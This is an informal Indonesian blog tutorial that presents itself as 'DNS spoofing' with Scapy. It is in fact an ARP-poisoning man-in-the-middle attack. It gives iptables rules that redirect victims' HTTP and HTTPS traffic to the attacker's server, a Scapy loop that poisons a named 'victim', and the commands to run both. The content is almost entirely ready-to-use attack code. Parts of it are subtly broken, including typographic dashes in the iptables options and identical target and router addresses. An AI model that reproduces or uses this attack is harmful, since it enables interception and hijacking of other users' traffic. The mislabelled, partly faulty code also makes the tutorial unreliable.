22 October 2011

DNS Spoofing Dengan Scapy

Aku mau share cara nya DNS Spofing Dengan Scapy..

Yang harus di siapin :
OS Linux yang udah terinstal Scapy ama pyton

Konfigurasinya :

  • yang pertama harus di lakukan adalah IP forwading.
    echo 1 > /proc/sys/net/ipv4/ip_forward


  • terus non aktivin ICMP redirect.
    echo 0 > /proc/sys/net/ipv4/conf/$INTERFACE/send_redirects


  • terus IP tables setting

    iptables –flush
    iptables –zero
    iptables –delete-chain
    iptables -F -t nat

    iptables –append FORWARD –in-interface wlan0/eth0 –jump ACCEPT
    iptables –table nat –append POSTROUTING –out-interface wlan0/eth0 –jump MASQUERADE
    iptables -t nat -A PREROUTING -p tcp –dport 80 –jump DNAT –to-destination 10.42.43.23
    iptables -t nat -A PREROUTING -p tcp –dport 443 –jump DNAT –to-destination 10.42.43.23


  • ini bash scriptnya, biar ga usah ngetik lagi di console.
    #!/bin/sh
    INTERFACE=”wlan0″ #cek interface dg mengetikan ifconfig di terminal
    SERVERWEB=’10.42.43.23′ #ip ente

    echo 1 > /proc/sys/net/ipv4/ip_forward
    echo 0 > /proc/sys/net/ipv4/conf/$INTERFACE/send_redirects

    #clear rule..
    iptables –flush
    iptables –zero
    iptables –delete-chain
    iptables -F -t nat

    iptables –append FORWARD –in-interface $INTERFACE –jump ACCEPT
    iptables –table nat –append POSTROUTING –out-interface $INTERFACE –jump MASQUERADE

    #rendirect traffic.. on my server/proxy
    iptables -t nat -A PREROUTING -p tcp –dport 80 –jump DNAT –to-destination $SERVERWEB
    iptables -t nat -A PREROUTING -p tcp –dport 443 –jump DNAT –to-destination $SERVERWEB

    save dengan extensi .sh


  • terus kode pytonnya
    from scapy.all import *;
    from time import sleep;
    conf.iface=’wlan0′;#network card

    target=”10.42.43.1″;#target /victim

    router=”10.42.43.1″;#routernya

    packet = ARP(); #bikin packet :P

    packet.psrc = router # Gateway

    packet.pdst = target # victim v.v

    try:
    while 1:
    send(packet, verbose=0);
    sleep(50);
    except:
    pass

    save dengan extensi .py


  • sekarang kita lakukan penyesuaian.
    INTERFACE=”wlan0″ (cek interface dengan ifconfig di terminal)
    SERVERWEB=’10.42.43.23′ #ip ente

    network card yang konek dengan internet serta ip lokal kamu
    &
    target=”10.42.43.19″;#target /victim

    router=”10.42.43.1″;#routernya

    kalau ingin semua permintaan paket client berpindah ke web server kamu
    target=”10.42.43.19/24″;#target /victim

    dengan begitu semua IP lokal client akan di alihkan ke IP local kamu…:D


    • eksekusi :
    ichamedusa@359imbox:~$/home/ichamedusa$ ./nama.sh
    ichamedusa@359imbox:~$/home/ichamedusa$ python nama.py

    No comments:

    Post a Comment

    Subscribe to: Post Comments (Atom)

    Advertise

    Learn More About Advertising Here